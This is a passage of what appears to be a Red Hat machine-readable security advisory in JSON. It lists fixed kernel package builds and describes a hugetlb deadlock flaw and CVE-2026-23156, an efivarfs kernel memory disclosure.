"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Linux kernel: Denial of Service due to a deadlock in hugetlb folio migration"
},
{
"cve": "CVE-2026-23156",
"cwe": {
"id": "CWE-390",
"name": "Detection of Error Condition Without Action"
},
"discovery_date": "2026-02-14T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439951"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the efivarfs component of the Linux kernel. This vulnerability, an information disclosure issue, arises from incorrect error handling in the efivar_entry_get function. An unprivileged local attacker can exploit this by reading from efivarfs, potentially causing uninitialized kernel memory to be copied to userspace. This could allow the attacker to obtain sensitive kernel memory contents, which may aid in bypassing security mitigations.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Linux kernel: Information disclosure in efivarfs via incorrect error propagation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A local information disclosure issue exists in efivarfs due to incorrect error propagation in efivar_entry_get. The wrapper efivar_entry_get called __efivar_entry_get to retrieve EFI variable data but always returned success 0 even when the underlying function failed. This causes callers to treat the output buffers attributes size and data as valid even though the read may not have completed. In the efivarfs file read path efivarfs_file_read this can result in copying an uninitialized or partially initialized kernel heap buffer to userspace. An unprivileged local attacker who can read from efivarfs can potentially obtain kernel memory contents. Such leaks can expose sensitive information and may be useful to bypass mitigations such as KASLR in combination with other vulnerabilities.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
